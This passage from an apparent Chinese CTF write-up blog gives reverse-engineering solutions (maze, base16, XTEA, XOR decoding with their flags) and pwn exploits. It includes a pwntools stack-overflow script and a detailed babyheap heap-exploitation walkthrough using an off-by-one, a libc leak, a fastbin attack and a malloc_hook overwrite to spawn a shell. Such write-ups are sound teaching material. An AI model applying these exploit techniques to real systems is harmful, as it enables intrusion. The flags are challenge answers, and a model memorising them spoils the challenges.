class="built_in">print</span>(flag)</span><br><span class="line"><span class="comment"># FZQ&#123;Za_Jiang_MiAN&#125;</span></span><br></pre></td></tr></table></figure>

<h2 id="test4-迷宫题"><a href="#test4-迷宫题" class="headerlink" title="test4 迷宫题"></a>test4 迷宫题</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 画迷宫</span></span><br><span class="line">s = <span class="string">&quot;11111111111111111111111111111111111111111111111111111111111111111111...............111111111111111...............111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111s111111111111111.1111111111111s111111111111111.11111111111111111111111111111.11111111111111111111111111111.11111111111111111111111111111.11111111111111111111111111111.11111111111111111111111111111.1111.111111111111111111111111.1t............111111111111111.1t............111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111...............111111111111111...............1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">19</span>):</span><br><span class="line">    <span class="built_in">print</span>(s[(i-<span class="number">1</span>)*<span class="number">60</span>:i*<span class="number">60</span>])</span><br><span class="line">    </span><br><span class="line"><span class="comment"># wwwwaaaaaaaaaaaaaasssssssssssssssddddddddddddddwwwwwwwaaaaaaaaaaaa</span></span><br></pre></td></tr></table></figure>



<h2 id="maze-迷宫题"><a href="#maze-迷宫题" class="headerlink" title="maze 迷宫题"></a>maze 迷宫题</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 改进版，若确定了左右，只输出4种可能。</span></span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"><span class="keyword">from</span> itertools <span class="keyword">import</span> permutations</span><br><span class="line">b=<span class="string">&quot;DSDDSSASSSDDDDWWAA&quot;</span>  <span class="comment"># wsad 上下左右</span></span><br><span class="line">a=[<span class="string">&quot;o&quot;</span>,<span class="string">&quot;O&quot;</span>,<span class="string">&quot;.&quot;</span>,<span class="string">&quot;0&quot;</span>]</span><br><span class="line">left_right = [<span class="string">&quot;o&quot;</span>,<span class="string">&quot;O&quot;</span>] <span class="comment"># 确定左或右在其中</span></span><br><span class="line"></span><br><span class="line">aa = <span class="built_in">list</span>(permutations(a))</span><br><span class="line">results=[]</span><br><span class="line"><span class="keyword">for</span> a3 <span class="keyword">in</span> aa:</span><br><span class="line">    <span class="keyword">if</span> <span class="string">&quot;left_right&quot;</span> <span class="keyword">in</span> <span class="built_in">dir</span>() <span class="keyword">and</span> <span class="built_in">len</span>(left_right)==<span class="number">2</span>:</span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">len</span>(<span class="built_in">set</span>(<span class="built_in">list</span>(a3[:<span class="number">2</span>]) + left_right)) != <span class="number">2</span> :</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">    b1=b.replace(<span class="string">&quot;A&quot;</span>,a3[<span class="number">0</span>])</span><br><span class="line">    b2=b1.replace(<span class="string">&quot;D&quot;</span>,a3[<span class="number">1</span>])</span><br><span class="line">    b3=b2.replace(<span class="string">&quot;W&quot;</span>,a3[<span class="number">2</span>])</span><br><span class="line">    b4=b3.replace(<span class="string">&quot;S&quot;</span>,a3[<span class="number">3</span>])</span><br><span class="line">    results.append(b4)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> res <span class="keyword">in</span> results:</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;nctf&#123;&quot;</span>+res+<span class="string">&quot;&#125;&quot;</span>)</span><br></pre></td></tr></table></figure>

<h2 id="base16"><a href="#base16" class="headerlink" title="base16"></a>base16</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">s = <span class="number">11171B</span>12261CDE2D1FDBD1F0DB2DF02DDAF01210101ECB28A5</span><br><span class="line"></span><br><span class="line">v4 = <span class="string">&#x27;DCBA&#x27;</span>;<span class="comment">// 这个要逆序，低地址到高地址</span></span><br><span class="line">  v5 = <span class="string">&#x27;21FE&#x27;</span>;</span><br><span class="line">  v6 = <span class="string">&#x27;6543&#x27;</span>;</span><br><span class="line">  v7 = <span class="string">&#x27;0987&#x27;</span>;</span><br><span class="line">  v8 = <span class="number">0</span>;</span><br><span class="line">  v12 = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; ; i += <span class="number">2</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    v2 = v12;</span><br><span class="line">    result = <span class="built_in">strlen</span>(a1);</span><br><span class="line">    <span class="keyword">if</span> ( v2 &gt;= result )</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    v10 = a1[v12] &gt;&gt; <span class="number">4</span>;</span><br><span class="line">    v9 = a1[v12] &amp; <span class="number">0xF</span>;</span><br><span class="line">    *(_BYTE *)(a2 + i) = *((_BYTE *)&amp;v4 + v10);</span><br><span class="line">    *(_BYTE *)(a2 + i + <span class="number">1</span>) = *((_BYTE *)&amp;v4 + v9);</span><br><span class="line">    ++v12;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line"></span><br><span class="line">a1 是输入，</span><br></pre></td></tr></table></figure>

<p>Payload:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">table=<span class="string">&quot;ABCDEF1234567890&quot;</span></span><br><span class="line">cipher=<span class="string">&quot;11171B12261CDE2D1FDBD1F0DB2DF02DDAF01210101ECB28A5&quot;</span></span><br><span class="line">flag=<span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="built_in">len</span>(cipher),<span class="number">2</span>):</span><br><span class="line">    a=table.find(cipher[i])</span><br><span class="line">    b=table.find(cipher[i+<span class="number">1</span>])</span><br><span class="line">    flag+=<span class="built_in">chr</span>((a&lt;&lt;<span class="number">4</span>)|b)</span><br><span class="line"><span class="built_in">print</span> flag</span><br></pre></td></tr></table></figure>



<h2 id="xtea"><a href="#xtea" class="headerlink" title="xtea"></a>xtea</h2><img src="/.io//0081Kckwgy1gkcefe0x1dj30bj04ljs1.jpg" alt="img" style="zoom:200%;">

<p>循环轮数为32，以及根据特殊的数字0x61c8847即可猜出是tea系列算法</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;string.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">int tea_decrypt(unsigned char *Key,unsigned char *Data,int BlockCount)</span><br><span class="line">&#123;</span><br><span class="line">    unsigned int y, z,sum,i,j; </span><br><span class="line">    unsigned int delta=0x9e3779b9; </span><br><span class="line">    unsigned int a, b, c, d;    </span><br><span class="line"></span><br><span class="line">    a = (unsigned int)((Key[0] &lt;&lt; 24) | (Key[1] &lt;&lt; 16) | (Key[2] &lt;&lt; 8) | Key[3]);</span><br><span class="line">    b = (unsigned int)((Key[4] &lt;&lt; 24) | (Key[5] &lt;&lt; 16) | (Key[6] &lt;&lt; 8) | Key[7]);</span><br><span class="line">    c = (unsigned int)((Key[8] &lt;&lt; 24) | (Key[9] &lt;&lt; 16) | (Key[10] &lt;&lt; 8) | Key[11]);</span><br><span class="line">    d = (unsigned int)((Key[12] &lt;&lt; 24) | (Key[13] &lt;&lt; 16) | (Key[14] &lt;&lt; 8) | Key[15]);</span><br><span class="line"></span><br><span class="line">    for(i = 0; i &lt; BlockCount; i++)</span><br><span class="line">    &#123;</span><br><span class="line">        sum=0xC6EF3720;</span><br><span class="line">        y = (unsigned int)((Data[i*8 + 0] &lt;&lt; 24) | (Data[i*8 + 1] &lt;&lt; 16) | (Data[i*8 + 2] &lt;&lt; 8) | Data[i*8 + 3]);</span><br><span class="line">        z = (unsigned int)((Data[i*8 + 4] &lt;&lt; 24) | (Data[i*8 + 5] &lt;&lt; 16) | (Data[i*8 + 6] &lt;&lt; 8) | Data[i*8 + 7]);</span><br><span class="line">        for(j = 0; j &lt; 32; j++)</span><br><span class="line">        &#123;</span><br><span class="line">            z -= ((y&lt;&lt;4) + c) ^ (y + sum) ^ ((y&gt;&gt;5) + d);</span><br><span class="line">            y -= ((z&lt;&lt;4) + a) ^ (z + sum) ^ ((z&gt;&gt;5) + b);</span><br><span class="line">            sum -= delta;  </span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        Data[i*8 + 0] = (unsigned char)((y &gt;&gt; 24) &amp; 0xFF);</span><br><span class="line">        Data[i*8 + 1] = (unsigned char)((y &gt;&gt; 16) &amp; 0xFF);</span><br><span class="line">        Data[i*8 + 2] = (unsigned char)((y &gt;&gt; 8) &amp; 0xFF);</span><br><span class="line">        Data[i*8 + 3] = (unsigned char)((y &gt;&gt; 0) &amp; 0xFF);</span><br><span class="line"></span><br><span class="line">        Data[i*8 + 4] = (unsigned char)((z &gt;&gt; 24) &amp; 0xFF);</span><br><span class="line">        Data[i*8 + 5] = (unsigned char)((z &gt;&gt; 16) &amp; 0xFF);</span><br><span class="line">        Data[i*8 + 6] = (unsigned char)((z &gt;&gt; 8) &amp; 0xFF);</span><br><span class="line">        Data[i*8 + 7] = (unsigned char)((z &gt;&gt; 0) &amp; 0xFF);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    return 0;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line">unsigned char cmp_data[32]=&#123;0x42,0xc7,0xca,0x40,0xc1,0x75,0x16,0xef,0xe7,0x37,0x6e,0x69,0x1b,0x0b,0x0f,0x78,0xdf,0xe0,0xe0,0x7b,0x5f,0x50,0x57,0x05,0xf4,0x73,0xd2,0x35,0x47,0xd5,0x6c,0x5a&#125;;</span><br><span class="line">int main()</span><br><span class="line">&#123;</span><br><span class="line">    int i;</span><br><span class="line">    unsigned char buf[32];</span><br><span class="line">    unsigned char key[16] = &#123;0x00,0x01,0x03,0x04,0x05,0x06,0x07,0x08,0x09,0x0a,0x0b,0x0c,0x0d,0xe,0xf,0x00&#125;;</span><br><span class="line">    char data[50];</span><br><span class="line">	</span><br><span class="line">    memcpy((void*)buf,cmp_data,32);</span><br><span class="line">    tea_decrypt(key,buf,4);</span><br><span class="line">	printf(&quot;decode:\n%s\n&quot;,buf);</span><br><span class="line">	system(&quot;pause&quot;);</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">得到flag:</span><br><span class="line">flag&#123;th1s_is_TEA_enc0de_hahaha_&#125;</span><br></pre></td></tr></table></figure>





<h2 id="csre"><a href="#csre" class="headerlink" title="csre"></a>csre</h2><p>Net逆向，de4dot去除混淆后使用dnspy打开</p>
<h2 id="simple12"><a href="#simple12" class="headerlink" title="simple12"></a>simple12</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">import base64</span><br><span class="line">str=&quot;e3nifIH9b_C@n@dH&quot;</span><br><span class="line">flag=&quot;&quot;</span><br><span class="line">for i in range(len(str)):</span><br><span class="line">    flag +=chr(ord(str[i])-i)</span><br><span class="line">print base64.b64decode(flag)</span><br><span class="line">#解出来：&#123;i_l0ve_you&#125;</span><br></pre></td></tr></table></figure>



<h2 id="easyXor"><a href="#easyXor" class="headerlink" title="easyXor"></a>easyXor</h2><p>分析，简单异或加密</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">enc=<span class="string">&quot;xe@ytr&#125;q-y=^*DmoSK&#123;PtNFyR1][Cd&quot;</span></span><br><span class="line">lenth=<span class="built_in">len</span>(enc)</span><br><span class="line">flag=<span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,lenth,<span class="number">3</span>):</span><br><span class="line">    flag+=<span class="built_in">chr</span>(<span class="built_in">ord</span>(enc[i])^lenth)</span><br><span class="line">    flag+=<span class="built_in">chr</span>(<span class="built_in">ord</span>(enc[i+<span class="number">1</span>])+<span class="number">7</span>)</span><br><span class="line">    flag+=<span class="built_in">chr</span>((<span class="built_in">ord</span>(enc[i+<span class="number">2</span>])^lenth)+<span class="number">3</span>)</span><br><span class="line"><span class="built_in">print</span> flag</span><br><span class="line"><span class="comment"># flag&#123;ocx6gDC4KvqZXeWmPMjL8FEJ&#125;</span></span><br></pre></td></tr></table></figure>



<h2 id="netnet"><a href="#netnet" class="headerlink" title="netnet"></a>netnet</h2><h1 id="pwn"><a href="#pwn" class="headerlink" title="pwn"></a>pwn</h1><h2 id="pwn00"><a href="#pwn00" class="headerlink" title="pwn00"></a>pwn00</h2><p>read 溢出</p>
<p>存在可利用函数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">Debug = 1</span><br><span class="line">if Debug:</span><br><span class="line">	io = process(&quot;./pwn00&quot;)</span><br><span class="line">else:</span><br><span class="line">	io = remote(&#x27;192.168.4.3&#x27;,11001) </span><br><span class="line"></span><br><span class="line">callsystem_addr = 0x4011AC</span><br><span class="line">payload = 0x18*&#x27;A&#x27;+p64(callsystem_addr)</span><br><span class="line">io.send(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>





<h2 id="Pwn111"><a href="#Pwn111" class="headerlink" title="Pwn111"></a>Pwn111</h2><h2 id="Pwn-babyheap"><a href="#Pwn-babyheap" class="headerlink" title="Pwn-babyheap"></a>Pwn-babyheap</h2><p>题目是2018 0ctf的babyheap，64位，不是一道难题</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/959d4b7b5af1">https://www.jianshu.com/p/959d4b7b5af1</a></p>
</blockquote>
<h3 id="漏洞"><a href="#漏洞" class="headerlink" title="漏洞"></a>漏洞</h3><p>这个题就是一个洞：</p>
<p><img src="/.io//0081Kckwgy1gkcyunav4dj30en056gnw.jpg" alt="image-20201104111150297"></p>
<p>这里允许一个字节的溢出，于是就可以覆盖到下一个chunk的size。<br> 首先，我们要先leak出地址。这里由于题目分配内存使用的是calloc，这样会在分配内存时，将内存清零，所以，我们不能直接得到地址。于是我们必须换思路。</p>
<h3 id="leak"><a href="#leak" class="headerlink" title="leak"></a>leak</h3><p>这里，我们先申请0x18的chunk，得到的是size为0x20的chunk，然后再申请两小的chunk（比如0x30），然后我们利用第一个chunk的一字节溢出，修改下一个chunk的size大一点，能包括下一个chunk的内容，（比如修改为0x60），然后，再free这个修改过的chunk，（当然，需要构造在这个chunk加0x60处的size的p位为1，来应对free的检查）之后我们再申请回这个chunk，（当然申请0x50）然后我们就能利用这个chunk，view到下一个chunk的内容了，如果下一个chunk的pd和bk有值就能看了。这是leak的思路。我想leak出libc的地址来着，但是，我们申请chunk的最大大小是0x58：</p>
<p>于是，我们还要使用一个字节的溢出使得这个chunk的size满足进入unsortbin的标准，于是，我们做这些操作：（比较繁琐，本人萌新）</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">new</span>(<span class="number">0x18</span>)<span class="meta">#0</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x18</span>)<span class="meta">#1</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x40</span>)<span class="meta">#2 #40</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x20</span>)<span class="meta">#3 #90</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x40</span>)<span class="meta">#4 #c0</span></span><br><span class="line">update(<span class="number">0</span>,<span class="number">0x19</span>,<span class="number">0x19</span>*<span class="string">&#x27;\x61&#x27;</span>)</span><br><span class="line">update(<span class="number">1</span>,<span class="number">0x10</span>,p64(<span class="number">0</span>)+p64(<span class="number">0x91</span>))</span><br><span class="line">update(<span class="number">2</span>,<span class="number">0x40</span>,<span class="number">8</span>*p64(<span class="number">0x91</span>))</span><br><span class="line">dele(<span class="number">1</span>)<span class="meta">#1</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x50</span>)<span class="meta">#1 20</span></span><br><span class="line">update(<span class="number">1</span>,<span class="number">0x30</span>,<span class="number">6</span>*p64(<span class="number">0x91</span>))</span><br><span class="line">update(<span class="number">4</span>,<span class="number">0x40</span>,<span class="number">4</span>*(p64(<span class="number">0x0</span>) + p64(<span class="number">0x21</span>)))</span><br><span class="line">dele(<span class="number">2</span>)<span class="meta">#2  40</span></span><br><span class="line">view(<span class="number">1</span>)</span><br><span class="line">p.recv(<span class="number">0x2a</span>)<span class="meta">#2a</span></span><br><span class="line">a = p.recv(<span class="number">8</span>)</span><br><span class="line">main_ar = u64(a)</span><br><span class="line">success(hex(u64(a)))</span><br><span class="line">libcc = u64(a) - <span class="number">0x3c4b78</span></span><br><span class="line">success(hex(libcc))</span><br></pre></td></tr></table></figure>

<p>首先申请2个能溢出的chunk，0号用来改1号的size，1号改2号size，还有看2号的fd，于是，然后我们需要一个size能进unsortbin的chunk，于是我申请了3个chunk，主要是为了修改完毕2的size为0x91之后，使得chunk2之后0x90的值处size位的p位为1。<br> 于是这样我们就得到了chunk2的fd，得到libc基址：</p>
<p><img src="https://upload-images.jianshu.io/upload_images/8148644-8570a48eb8ea7b1f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/594/format/webp" alt="img"></p>
<p><img src="https://upload-images.jianshu.io/upload_images/8148644-b4d3b6d27c288c2e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/271/format/webp" alt="img"></p>
<h3 id="fastbin-attack"><a href="#fastbin-attack" class="headerlink" title="fastbin attack"></a>fastbin attack</h3><p>然后我们打算fastbin attack，但是pie使得无法写got表，那么我们就写malloc_hook，这着实让我这个萌新满头雾水，因为我在malloc_hook上没找到符合格式的size，然后尝试了一种新思路，就是改写main_arena上的top_chunk的地址，这样，我们申请内存时，就可以得到malloc_hook上面的地址，然后对malloc_hook的值进行任意写了。<br> 于是我先把unsortbin清空（因为我比较菜，害怕之后申请chunk会乱）。然后，由于在fastbin attack的时候需要符合size的检查，于是，我先在main_arena上布size，这时，我们可以利用main_arena记录fastbin的链，我们把fd设置成size</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#--free to fastbins</span></span><br><span class="line">update(<span class="number">5</span>,<span class="number">0x10</span>,<span class="number">2</span>*(p64(<span class="number">0</span>)+p64(<span class="number">0x31</span>)))</span><br><span class="line">update(<span class="number">1</span>,<span class="number">0x50</span>,<span class="number">10</span>*(p64(<span class="number">0</span>)+p64(<span class="number">0x51</span>)))</span><br><span class="line">dele(<span class="number">2</span>)<span class="meta">#2</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#--change mainarena </span></span><br><span class="line">des_addr = main_ar - <span class="number">0x40</span></span><br><span class="line">a = p64(<span class="number">0</span>) + p64(<span class="number">0x51</span>) + p64(<span class="number">0</span>) + p64(<span class="number">0x51</span>) + p64(<span class="number">0x41</span>) + p64(<span class="number">0x51</span>)</span><br><span class="line">update(<span class="number">1</span>,len(a),a)</span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x40</span>)<span class="meta">#2 40</span></span><br></pre></td></tr></table></figure>

<p>于是这里main_arena上就有0x41了：</p>
<p><img src="https://upload-images.jianshu.io/upload_images/8148644-0ffacb8f4259faa8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/621/format/webp" alt="img"></p>
<p>然后申请掉这个fastbin：</p>
<p><img src="https://upload-images.jianshu.io/upload_images/8148644-7a70ab2c0d51159c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/741/format/webp" alt="img"></p>
<p>然后愉快fastbin attack<br> 然后改掉topchunk</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#--change topchunk</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x30</span>)<span class="meta">#8</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x38</span>)<span class="meta">#9</span></span><br><span class="line">payload = p64(<span class="number">0</span>)*<span class="number">6</span> + p64(des_addr<span class="number">-56</span>)</span><br><span class="line">update(<span class="number">9</span>,len(payload),payload)</span><br></pre></td></tr></table></figure>

<p><img src="https://upload-images.jianshu.io/upload_images/8148644-9179233ceec952a4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/833/format/webp" alt="img"></p>
<p>然后再申请空间就能从topchunk中申请，写到malloc_hook了，利用onegadget，再次calloc就能getshell了</p>
<p><img src="https://upload-images.jianshu.io/upload_images/8148644-63fbd2448f527477.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/645/format/webp" alt="img"></p>
<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># coding=utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn import *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">context.terminal = [<span class="string">&#x27;gnome-terminal&#x27;</span>,<span class="string">&#x27;-x&#x27;</span>,<span class="string">&#x27;bash&#x27;</span>,<span class="string">&#x27;-c&#x27;</span>]</span><br><span class="line">p = process(<span class="string">&#x27;./babyheap&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;/lib/x86_64-linux-gnu/libc.so.6&#x27;</span>)</span><br><span class="line"></span><br><span class="line">def <span class="keyword">new</span>(size):</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;Command: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;Size: &#x27;</span>)</span><br><span class="line">    p.sendline(str(size))</span><br><span class="line"></span><br><span class="line">def dele(index):</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;Command: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;Index: &#x27;</span>)</span><br><span class="line">    p.sendline(str(index))</span><br><span class="line"></span><br><span class="line">def update(index,size,context):</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;Command: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;Index: &#x27;</span>)</span><br><span class="line">    p.sendline(str(index))</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;Size: &#x27;</span>)</span><br><span class="line">    p.sendline(str(size))</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;Content: &#x27;</span>)</span><br><span class="line">    p.sendline(context)</span><br><span class="line"></span><br><span class="line">def view(index):</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;Command: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;4&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;Index: &#x27;</span>)</span><br><span class="line">    p.sendline(str(index))</span><br><span class="line"></span><br><span class="line"><span class="comment">#---leak libc</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x18</span>)<span class="comment">#0</span></span><br><span class="line"><span 